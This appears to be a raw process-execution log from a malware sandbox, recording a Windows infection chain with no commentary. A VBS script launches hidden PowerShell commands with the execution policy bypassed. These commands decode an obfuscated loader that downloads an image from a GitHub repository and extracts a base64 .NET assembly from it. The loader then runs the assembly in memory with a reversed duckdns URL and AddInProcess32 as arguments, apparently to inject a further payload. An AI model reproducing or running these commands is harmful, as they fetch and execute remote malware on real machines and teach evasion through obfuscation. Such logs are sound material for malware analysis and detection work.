wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\THURSDAYYYYMPDW-constraints.vbs
300powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9aW1hZ2VVcmwgPSB7MX1odHRwczovL3Jhdy5naXRodWInKyd1c2VyY29udGVudC5jb20vQ3J5cHRlcnNBbmRUb29sc09maWNpYWwvWklQL3JlZnMvaGVhZHMnKycvbWFpbi9EZScrJ3RhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaScrJ2VudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllJysnbnQ7ezB9aW1hZ2UnKydCJysneXRlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hJysnZERhdGEoezB9aW1hZ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGknKyduZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWcnKydlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0JysnX1NUQVJUPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRTY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hJysnZ2VUZXh0LkluZGV4T2YoezB9ZW5kRmxhZyk7ezB9c3RhJysncnRJbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZCcrJ2V4IC1ndCB7MH1zdGFydEluZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhcnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW4nKydndGggPSB7MH1lbmRJbicrJ2RleCAtIHswfXN0YXJ0SW5kJysnZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJJysnbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH0nKydjb20nKydtYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHswfWJhc2U2NENvbW1hbmQpO3swfWxvYWRlZCcrJ0Fzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh7MH1jbycrJ21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib20nKydlXS5HZXRNZXRob2QoezF9VkFJezF9KTt7JysnMH12YWlNZXRob2QuSW52Jysnb2tlKHswfW51JysnbGwsIEAoezF9dHh0LnFuYWJzb3RpdXFlZGV0YWRwdXJlZ2FuYW1vZ25hbWRldGFkJysnbmFtL2dyby5zJysnbmRrY3VkLmVlZWVsaWZ5eXl5eXlhZHNydWh0Ly86cHR0aHsxfSwgezF9ZGVzJysnYXRpdmFkb3sxfSwgezF9ZGVzYScrJ3RpdmFkb3sxfSwgezF9ZGVzJysnYXRpdmFkb3sxfSwgezF9QWRkSW5Qcm9jZXNzMzJ7MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWRlc2F0aXZhZG97MX0pKTsnKSAgLWZbY0hhcl0zNixbY0hhcl0zOSkgfCAmKCAkZU5WOmNvbVNQRUNbNCwyNCwyNV0tSk9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
2080powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}imageUrl = {1}https://raw.github'+'usercontent.com/CryptersAndToolsOficial/ZIP/refs/heads'+'/main/De'+'tahNote_V.jpg {1};{0}webCli'+'ent = New-Object Sy'+'stem.Net.WebClie'+'nt;{0}image'+'B'+'ytes = {0}webClient.Downloa'+'dData({0}imageUrl);{0}imageText = [System.Text.Encodi'+'ng]::UTF8.GetString('+'{0}imag'+'eBytes);{0}startFlag = {1}<<BASE64'+'_START>>{1};{0}endFlag = {1}<<BASE64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}ima'+'geText.IndexOf({0}endFlag);{0}sta'+'rtIndex -ge 0 -and {0}endInd'+'ex -gt {0}startIndex;{0}startIndex += {0}startFlag.Length;{0}base64Len'+'gth = {0}endIn'+'dex - {0}startInd'+'ex;{0}base64Command = {0}imageText.Substring({0}startI'+'ndex, {0}base64Length);{0}'+'com'+'mandBytes = [System.Convert]::FromBase64String({0}base64Command);{0}loaded'+'Assembly = [System.Reflection.Assembly]::Load({0}co'+'mmandBytes);{0}vaiMethod = [dnlib.IO.Hom'+'e].GetMethod({1}VAI{1});{'+'0}vaiMethod.Inv'+'oke({0}nu'+'ll, @({1}txt.qnabsotiuqedetadpureganamognamdetad'+'nam/gro.s'+'ndkcud.eeeelifyyyyyyadsruht//:ptth{1}, {1}des'+'ativado{1}, {1}desa'+'tivado{1}, {1}des'+'ativado{1}, {1}AddInProcess32{1}, {1}desativado{1}, {1}desativado{1}));') -f[cHar]36,[cHar]39) | &( $eNV:comSPEC[4,24,25]-JOIn'')"
2204